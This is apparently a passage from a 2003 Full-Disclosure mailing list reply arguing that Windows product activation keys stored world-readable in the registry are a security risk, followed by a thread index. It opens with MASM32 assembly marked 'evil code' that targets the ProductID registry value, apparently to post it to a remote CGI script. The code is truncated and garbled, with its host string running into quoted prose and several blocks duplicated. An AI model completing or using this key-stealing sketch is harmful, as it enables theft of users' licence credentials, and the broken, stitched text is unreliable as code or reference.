with simple assembly code you could send the data to a cgi script too
;-------------------------begin evil code ----------------------
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
include \masm32\include\urlmon.inc
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
include \masm32\include\urlmon.inc
includelib \masm32\lib\urlmon.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
.data
SubKey2 db "SOFTWARE\Microsoft\Windows\CurrentVersion\",0
szWinKey db "ProductID",0
szHost db "company who laid off their admin and he took all their product keys and
posted them on the internet. Well to make a long story short, somehow
applying a hotfix caused the software to deactivate (it has to have a
deactivation feature or what good is it?) and require activation again which
of course was impossible since MS shut those numbers down.
It got to thinking, what if the dcom worm had grabbed the product key from
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]
"ProductKey"="XXXXX-XXXXX-XXXXX-XXXXX-XXXXX" or
ProductID="XXXXX-OEM-XXXXXXX-XXXXX"
and posted it to a dozen random newsgroups? According to the EULA Microsoft
has the right to shut down every one who becomes infected and compromised in
this manner.
Sure looks like a secu! rity issue to me, product activation makes this
registry entry which allows all users full read access a dangerous thing to
have laying around unprotected.
Geo.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
SubKey2 db "SOFTWARE\Microsoft\Windows\CurrentVersion\",0
szWinKey db "ProductID",0
szHost db "company who laid off their admin and he took all their product keys and
posted them on the internet. Well to make a long story short, somehow
applying a hotfix caused the software to deactivate (it has to have a
deactivation feature or what good is it?) and require activation again which
of course was impossible since MS shut those numbers down.
It got to thinking, what if the dcom worm had grabbed the product key from
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]
"ProductKey"="XXXXX-XXXXX-XXXXX-XXXXX-XXXXX" or
ProductID="XXXXX-OEM-XXXXXXX-XXXXX"
and posted it to a dozen random newsgroups? According to the EULA Microsoft
has the right to shut down every one who becomes infected and compromised in
this manner.
Sure looks like a secu! rity issue to me, product activation makes this
registry entry which allows all users full read access a dangerous thing to
have laying around unprotected.
Geo.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
- Re: [Full-Disclosure] Anybody know what Sobig.F has dow... Nick FitzGerald
- Re: [Full-Disclosure] Anybody know what Sobig.F ha... Brent J. Nordquist
- Re: [Full-Disclosure] Anybody know what Sobig.F has dow... Tim Fletcher
- Re: [Full-Disclosure] Anybody know what Sobig.F ha... Tim Fletcher
- Re: [Full-Disclosure] Anybody know what Sobig.F ha... Michael Renzmann
- RE: [Full-Disclosure] Anybody know what Sobig.F has dow... Robert J. Liebsch
- RE: [Full-Disclosure] Anybody know what Sobig.F has dow... Ferris, Robin
- RE: [Full-Disclosure] Anybody know what Sobig.F ha... Nick FitzGerald
- [Full-Disclosure] Product activation is exploi... Geoincidents
- RE: [Full-Disclosure] Product activation i... w g
- RE: [Full-Disclosure] Product activation i... Rick Kingslan
- Re: [Full-Disclosure] Product activati... Kristian Hermansen
- Re: [Full-Disclosure] Product act... Lan Guy
- RE: [Full-Disclosure] Product act... Rick Kingslan
- RE: [Full-Disclosure] Product... Justin Shin
- Re: [Full-Disclosure] Product activati... Geoincidents
- RE: [Full-Disclosure] Product act... Rick Kingslan
